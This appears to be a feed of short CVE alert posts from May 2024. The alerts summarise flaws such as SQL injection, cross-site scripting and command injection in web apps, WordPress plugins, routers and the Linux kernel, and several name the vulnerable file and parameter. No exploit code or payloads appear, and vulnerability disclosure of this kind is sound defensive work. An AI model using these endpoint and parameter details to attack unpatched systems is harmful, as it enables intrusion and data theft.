🚨 CVE-2024-5371A vulnerability classified as problematic has been found in Kashipara College Management System 1.0. This affects an unknown part of the file submit_enroll_student.php. The manipulation of the argument class_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266283.🎖@cveNotify |
|
| 2024-05-26 18:37:24 |
🚨 CVE-2024-5370A vulnerability was found in Kashipara College Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file submit_enroll_staff.php. The manipulation of the argument class_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 17:37:24 |
🚨 CVE-2024-5369A vulnerability was found in Kashipara College Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file submit_admin.php. The manipulation of the argument admin_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266281 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 16:37:24 |
🚨 CVE-2024-5368A vulnerability was found in Kashipara College Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file delete_faculty.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266280.🎖@cveNotify |
|
| 2024-05-26 15:37:25 |
🚨 CVE-2024-5367A vulnerability was found in Kashipara College Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file each_extracurricula_activities.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266279.🎖@cveNotify |
|
| 2024-05-26 13:37:25 |
🚨 CVE-2024-5365A vulnerability, which was classified as critical, was found in SourceCodester Best House Rental Management System up to 1.0. This affects an unknown part of the file manage_payment.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266277 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 13:37:24 |
🚨 CVE-2024-5364A vulnerability, which was classified as critical, has been found in SourceCodester Best House Rental Management System up to 1.0. Affected by this issue is some unknown functionality of the file manage_tenant.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266276.🎖@cveNotify |
|
| 2024-05-26 12:37:25 |
🚨 CVE-2024-5363A vulnerability classified as critical was found in SourceCodester Best House Rental Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266275.🎖@cveNotify |
|
| 2024-05-26 12:37:24 |
🚨 CVE-2024-5362A vulnerability classified as critical has been found in SourceCodester Online Hospital Management System 1.0. Affected is an unknown function of the file departmentDoctor.php. The manipulation of the argument deptid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266274 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 11:37:25 |
🚨 CVE-2024-5361A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been rated as critical. This issue affects some unknown processing of the file /admin/normal-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266273 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 11:37:24 |
🚨 CVE-2024-5360A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/foreigner-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266272.🎖@cveNotify |
|
| 2024-05-26 10:37:25 |
🚨 CVE-2024-5359A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been classified as critical. This affects an unknown part of the file /admin/foreigner-search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266271.🎖@cveNotify |
|
| 2024-05-26 09:37:24 |
🚨 CVE-2024-5358A vulnerability was found in PHPGurukul Zoo Management System 2.1 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/normal-search.php. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266270 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 08:37:26 |
🚨 CVE-2024-5357A vulnerability has been found in PHPGurukul Zoo Management System 2.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 08:37:25 |
🚨 CVE-2024-5356A vulnerability, which was classified as critical, was found in anji-plus AJ-Report up to 1.4.1. Affected is an unknown function of the file /dataSet/testTransform;swagger-ui. The manipulation of the argument dynSentence leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266268.🎖@cveNotify |
|
| 2024-05-26 06:37:24 |
🚨 CVE-2024-5355A vulnerability, which was classified as critical, has been found in anji-plus AJ-Report up to 1.4.1. This issue affects the function IGroovyHandler. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266267.🎖@cveNotify |
|
| 2024-05-26 05:37:24 |
🚨 CVE-2024-5354A vulnerability classified as problematic was found in anji-plus AJ-Report up to 1.4.1. This vulnerability affects unknown code of the file /reportShare/detailByCode. The manipulation of the argument shareToken leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266266 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 04:37:24 |
🚨 CVE-2024-5353A vulnerability classified as critical has been found in anji-plus AJ-Report up to 1.4.1. This affects the function decompress of the component ZIP File Handler. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266265 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 01:37:24 |
🚨 CVE-2024-5352A vulnerability was found in anji-plus AJ-Report up to 1.4.1. It has been rated as critical. Affected by this issue is the function validationRules of the component com.anjiplus.template.gaea.business.modules.datasetparam.controller.DataSetParamController#verification. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266264.🎖@cveNotify |
|
| 2024-05-26 00:37:24 |
🚨 CVE-2024-5351A vulnerability was found in anji-plus AJ-Report up to 1.4.1. It has been declared as critical. Affected by this vulnerability is the function getValueFromJs of the component Javascript Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266263.🎖@cveNotify |
|
| 2024-05-25 23:37:24 |
🚨 CVE-2024-5350A vulnerability was found in anji-plus AJ-Report up to 1.4.1. It has been classified as critical. Affected is the function pageList of the file /pageList. The manipulation of the argument p leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266262 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-25 22:37:24 |
🚨 CVE-2024-5340A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/vpn/autovpn/sub_commit.php. The manipulation of the argument key leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-25 18:37:24 |
🚨 CVE-2024-30056Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-05-25 17:37:24 |
🚨 CVE-2024-5339A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/vpn/autovpn/online_check.php. The manipulation of the argument peernode leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-25 16:37:25 |
🚨 CVE-2024-5338A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been classified as critical. Affected is an unknown function of the file /view/vpn/autovpn/online.php. The manipulation of the argument peernode leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-25 16:37:24 |
🚨 CVE-2023-52656In the Linux kernel, the following vulnerability has been resolved:io_uring: drop any code related to SCM_RIGHTSThis is dead code after we dropped support for passing io_uring fdsover SCM_RIGHTS, get rid of it.🎖@cveNotify |
|
| 2024-05-25 06:37:24 |
🚨 CVE-2024-4045The Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘campaign_id’ parameter in versions up to, and including, 2.16.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-25 04:37:24 |
🚨 CVE-2024-5218The Reviews and Rating – Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file upload feature in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-25 03:37:25 |
🚨 CVE-2024-5229The Primary Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-25 03:37:24 |
🚨 CVE-2024-4858The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_testimonials_option_callback' function in versions up to, and including, 10.2.0. This makes it possible for unauthenticated attackers to update the OpenAI API key, disabling the feature.🎖@cveNotify |
|
| 2024-05-25 02:37:24 |
🚨 CVE-2024-5220The ND Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's upload feature in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 22:37:24 |
🚨 CVE-2024-36079An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it.🎖@cveNotify |
|
| 2024-05-24 21:37:25 |
🚨 CVE-2024-35374Mocodo Mocodo Online 4.2.6 and below does not properly sanitize the sql_case input field in /web/generate.php, allowing remote attackers to execute arbitrary SQL commands and potentially command injection, leading to remote code execution (RCE) under certain conditions.🎖@cveNotify |
|
| 2024-05-24 21:37:24 |
🚨 CVE-2024-35232github.com/huandu/facebook is a Go package that fully supports the Facebook Graph API with file upload, batch request and marketing API. access_token can be exposed in error message on fail in HTTP request. This issue has been patched in version 2.7.2.🎖@cveNotify |
|
| 2024-05-24 19:37:31 |
🚨 CVE-2024-35388TOTOLINK NR1800X v9.1.0u.6681_B20230703 was discovered to contain a stack overflow via the password parameter in the function urldecode🎖@cveNotify |
|
| 2024-05-24 19:37:27 |
🚨 CVE-2024-33471An issue in the Sensor Settings of AVTECH Room Alert 4E v4.4.0 allows attackers to gain access to SMTP credentials in plaintext via a crafted AJAX request. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-05-24 19:37:26 |
🚨 CVE-2024-20676Azure Storage Mover Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-24 19:37:25 |
🚨 CVE-2024-20674Windows Kerberos Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-24 19:37:24 |
🚨 CVE-2024-20654Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-05-24 18:37:33 |
🚨 CVE-2024-5273Jenkins Report Info Plugin 1.2 and earlier does not perform path validation of the workspace directory while serving report files, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path.🎖@cveNotify |
|
| 2024-05-24 18:37:32 |
🚨 CVE-2024-35595An arbitrary file upload vulnerability in the File Preview function of Xintongda OA v2023.12.30.1 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-24 18:37:31 |
🚨 CVE-2024-35592An arbitrary file upload vulnerability in the Upload function of Box-IM v2.0 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-24 18:37:30 |
🚨 CVE-2024-35591An arbitrary file upload vulnerability in O2OA v8.3.8 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-24 18:37:27 |
🚨 CVE-2024-5318An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.11 prior to 16.10.6, starting from 16.11 prior to 16.11.3, and starting from 17.0 prior to 17.0.1. A Guest user can view dependency lists of private projects through job artifacts.🎖@cveNotify |
|
| 2024-05-24 18:37:26 |
🚨 CVE-2023-49574A vulnerability has been discovered in VX Search Enterprise affecting version 10.2.14 that could allow an attacker to execute persistent XSS through /add_job in job_name. This vulnerability could allow an attacker to store malicious JavaScript payloads on the system to be triggered when the page loads.🎖@cveNotify |
|
| 2024-05-24 18:37:25 |
🚨 CVE-2023-49572A vulnerability has been discovered in VX Search Enterprise affecting version 10.2.14 that could allow an attacker to execute persistent XSS through /setup_odbc in odbc_data_source, odbc_user and odbc_password parameters. This vulnerability could allow an attacker to store malicious JavaScript payloads on the system to be triggered when the page loads.🎖@cveNotify |
|
| 2024-05-24 17:37:26 |
🚨 CVE-2024-36049Aptos Wisal payroll accounting before 7.1.6 uses hardcoded credentials in the Windows client to fetch the complete list of usernames and passwords from the database server, using an unencrypted connection. This allows attackers in a machine-in-the-middle position read and write access to personally identifiable information (PII) and especially payroll data and the ability to impersonate legitimate users with respect to the audit log.🎖@cveNotify |
|
| 2024-05-24 17:37:25 |
🚨 CVE-2023-46442An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS).🎖@cveNotify |
|
| 2024-05-24 17:37:24 |
🚨 CVE-2023-30394The MoveIt framework 1.1.11 for ROS allows cross-site scripting (XSS) via the API authentication function.🎖@cveNotify |
|
| 2024-05-24 15:37:25 |
🚨 CVE-2023-38267IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. IBM X-Force ID: 260584.🎖@cveNotify |
|
| 2024-05-24 14:37:30 |
🚨 CVE-2024-5273Jenkins Report Info Plugin 1.2 and earlier does not perform path validation of the workspace directory while serving report files, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path.🎖@cveNotify |
|
| 2024-05-24 14:37:26 |
🚨 CVE-2024-35593An arbitrary file upload vulnerability in the File preview function of Raingad IM v4.1.4 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-24 14:37:25 |
🚨 CVE-2024-35591An arbitrary file upload vulnerability in O2OA v8.3.8 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-24 14:37:24 |
🚨 CVE-2024-4978Justice AV Solutions Viewer Setup 8.3.7.250-1 contains a malicious binary when executed and is signed with an unexpected authenticode signature. A remote, privileged threat actor may exploit this vulnerability to execute of unauthorized PowerShell commands.🎖@cveNotify |
|
| 2024-05-24 13:37:26 |
🚨 CVE-2023-49575A vulnerability has been discovered in VX Search Enterprise affecting version 10.2.14 that could allow an attacker to execute persistent XSS through /setup_smtp in smtp_server, smtp_user, smtp_password and smtp_email_address parameters. This vulnerability could allow an attacker to store malicious JavaScript payloads on the system to be triggered when the page loads.🎖@cveNotify |
|
| 2024-05-24 13:37:25 |
🚨 CVE-2023-49573A vulnerability has been discovered in VX Search Enterprise affecting version 10.2.14 that could allow an attacker to execute persistent XSS through /add_command_action in action_value. This vulnerability could allow an attacker to store malicious JavaScript payloads on the system to be triggered when the page loads.🎖@cveNotify |
|
| 2024-05-24 13:37:24 |
🚨 CVE-2023-49572A vulnerability has been discovered in VX Search Enterprise affecting version 10.2.14 that could allow an attacker to execute persistent XSS through /setup_odbc in odbc_data_source, odbc_user and odbc_password parameters. This vulnerability could allow an attacker to store malicious JavaScript payloads on the system to be triggered when the page loads.🎖@cveNotify |
|
| 2024-05-24 13:07:37 |
🚨 CVE-2024-3718The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's widgets all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 13:07:33 |
🚨 CVE-2024-36361Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the compileClient, compileFileClient, or compileClientWithDependenciesTracked function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers.🎖@cveNotify |
|
| 2024-05-24 13:07:32 |
🚨 CVE-2024-0867The Email Log plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 2.4.8 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.🎖@cveNotify |
|
| 2024-05-24 13:07:31 |
🚨 CVE-2023-1001A vulnerability, which was classified as problematic, has been found in xuliangzhan vxe-table up to 3.7.9. This issue affects the function export of the file packages/textarea/src/textarea.js of the component vxe-textarea. The manipulation of the argument inputValue leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.7.10 is able to address this issue. The patch is named d70b0e089740b65a22c89c106ebc4627ac48a22d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-266123.🎖@cveNotify |
|
| 2024-05-24 13:07:30 |
🚨 CVE-2024-3557The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpgmza shortcode in all versions up to, and including, 9.0.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 13:07:27 |
🚨 CVE-2024-2784The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Hover Card widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 13:07:26 |
🚨 CVE-2024-4544The Pie Register - Social Sites Login (Add on) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.7. This is due to insufficient verification on the user being supplied during a social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.🎖@cveNotify |
|
| 2024-05-24 13:07:25 |
🚨 CVE-2024-5205The Videojs HTML5 Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videojs_video shortcode in all versions up to, and including, 1.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 13:07:24 |
🚨 CVE-2024-4409The WP-ViperGB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-24 12:38:02 |
🚨 CVE-2023-47710IBM Security Guardium 11.4, 11.5, and 12.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271525.🎖@cveNotify |
|
| 2024-05-24 10:37:25 |
🚨 CVE-2024-5314Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder y sortfield in /dolibarr/admin/dict.php.🎖@cveNotify |
|
| 2024-05-24 10:37:24 |
🚨 CVE-2020-36825** UNSUPPORTED WHEN ASSIGNED ** ** DISPUTED ** A vulnerability has been found in cyberaz0r WebRAT up to 20191222 and classified as critical. This vulnerability affects the function download_file of the file Server/api.php. The manipulation of the argument name leads to unrestricted upload. The attack can be initiated remotely. The real existence of this vulnerability is still doubted at the moment. The patch is identified as 0c394a795b9c10c07085361e6fcea286ee793701. It is recommended to apply a patch to fix this issue. VDB-257782 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The issue, discovered in a 20-stars GitHub project (now private) by its author, had CVE requested by a third party 4 years post-resolution, referencing the fix commit (now a broken link). Due to minimal attention and usage, it should not be eligible for CVE according to the project maintainer.🎖@cveNotify |
|
| 2024-05-24 09:37:55 |
🚨 CVE-2024-5310A vulnerability classified as problematic has been found in JFinalCMS up to 20221020. This affects an unknown part of the file /admin/content. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266121 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-24 09:37:54 |
🚨 CVE-2024-4037The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.7.02.003. This is due to the plugin allowing unauthenticated users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-05-24 08:37:55 |
🚨 CVE-2024-4366The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘block_id’ parameter in versions up to, and including, 2.13.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 08:37:54 |
🚨 CVE-2021-20597Insufficiently Protected Credentials vulnerability in Mitsubishi Electric MELSEC iQ-R series Safety CPU modules R08/16/32/120SFCPU firmware versions "26" and prior and Mitsubishi Electric MELSEC iQ-R series SIL2 Process CPU modules R08/16/32/120PSFCPU firmware versions "11" and prior allows a remote unauthenticated attacker to login to the target unauthorizedly by sniffing network traffic and obtaining credentials when registering user information in the target or changing a password.🎖@cveNotify |
|
| 2024-05-24 08:37:53 |
🚨 CVE-2021-20594Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Mitsubishi Electric MELSEC iQ-R series Safety CPU modules R08/16/32/120SFCPU firmware versions "26" and prior and Mitsubishi Electric MELSEC iQ-R series SIL2 Process CPU modules R08/16/32/120PSFCPU firmware versions "11" and prior allows a remote unauthenticated attacker to acquire legitimate user names registered in the module via brute-force attack on user names.🎖@cveNotify |
|
| 2024-05-24 07:37:24 |
🚨 CVE-2023-1111A vulnerability was found in FastCMS up to 0.1.5 and classified as problematic. Affected by this issue is some unknown functionality of the component New Article Tab. The manipulation of the argument Title leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266126 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-24 06:37:51 |
🚨 CVE-2024-5142Stored Cross-Site Scripting vulnerability in Social Module in M-Files Hubshare before version 5.0.3.8 allows authenticated attacker to run scripts in other users browser🎖@cveNotify |
|
| 2024-05-24 06:37:47 |
🚨 CVE-2024-36361Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the compileClient, compileFileClient, or compileClientWithDependenciesTracked function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers.🎖@cveNotify |
|
| 2024-05-24 06:37:46 |
🚨 CVE-2024-0867The Email Log plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 2.4.8 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.🎖@cveNotify |
|
| 2024-05-24 06:37:45 |
🚨 CVE-2023-1001A vulnerability, which was classified as problematic, has been found in xuliangzhan vxe-table up to 3.7.9. This issue affects the function export of the file packages/textarea/src/textarea.js of the component vxe-textarea. The manipulation of the argument inputValue leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.7.10 is able to address this issue. The patch is named d70b0e089740b65a22c89c106ebc4627ac48a22d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-266123.🎖@cveNotify |
|
| 2024-05-24 04:38:01 |
🚨 CVE-2024-4544The Pie Register - Social Sites Login (Add on) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.7. This is due to insufficient verification on the user being supplied during a social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.🎖@cveNotify |
|
| 2024-05-24 03:37:45 |
🚨 CVE-2024-5205The Videojs HTML5 Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videojs_video shortcode in all versions up to, and including, 1.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-24 03:37:44 |
🚨 CVE-2024-4409The WP-ViperGB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-24 01:37:25 |
🚨 CVE-2024-35997In the Linux kernel, the following vulnerability has been resolved:HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-upThe flag I2C_HID_READ_PENDING is used to serialize I2C operations.However, this is not necessary, because I2C core already has its ownlocking for that.More importantly, this flag can cause a lock-up: if the flag is set ini2c_hid_xfer() and an interrupt happens, the interrupt handler(i2c_hid_irq) will check this flag and return immediately without doinganything, then the interrupt handler will be invoked again in aninfinite loop.Since interrupt handler is an RT task, it takes over the CPU and theflag-clearing task never gets scheduled, thus we have a lock-up.Delete this unnecessary flag.🎖@cveNotify |
|
| 2024-05-24 00:37:59 |
🚨 CVE-2024-4437The etcd package distributed with the Red Hat OpenStack platform has an incomplete fix for CVE-2021-44716. This issue occurs because the etcd package in the Red Hat OpenStack platform is using http://golang.org/x/net/http2 instead of the one provided by Red Hat Enterprise Linux versions, meaning it should be updated at compile time instead.🎖@cveNotify |
|
| 2024-05-24 00:37:55 |
🚨 CVE-2024-31083A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.🎖@cveNotify |
|
| 2024-05-24 00:37:54 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-23 21:07:31 |
🚨 CVE-2024-35984In the Linux kernel, the following vulnerability has been resolved:i2c: smbus: fix NULL function pointer dereferenceBaruch reported an OOPS when using the designware controller as targetonly. Target-only modes break the assumption of one transfer functionalways being available. Fix this by always checking the pointer in__i2c_transfer.[wsa: dropped the simplification in core-smbus to avoid theoretical regressions]🎖@cveNotify |
|
| 2024-05-23 21:07:30 |
🚨 CVE-2024-35972In the Linux kernel, the following vulnerability has been resolved:bnxt_en: Fix possible memory leak in bnxt_rdma_aux_device_init()If ulp = kzalloc() fails, the allocated edev will leak because it isnot properly assigned and the cleanup path will not be able to free it.Fix it by assigning it properly immediately after allocation.🎖@cveNotify |
|
| 2024-05-23 21:07:26 |
🚨 CVE-2024-34905FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-05-23 21:07:25 |
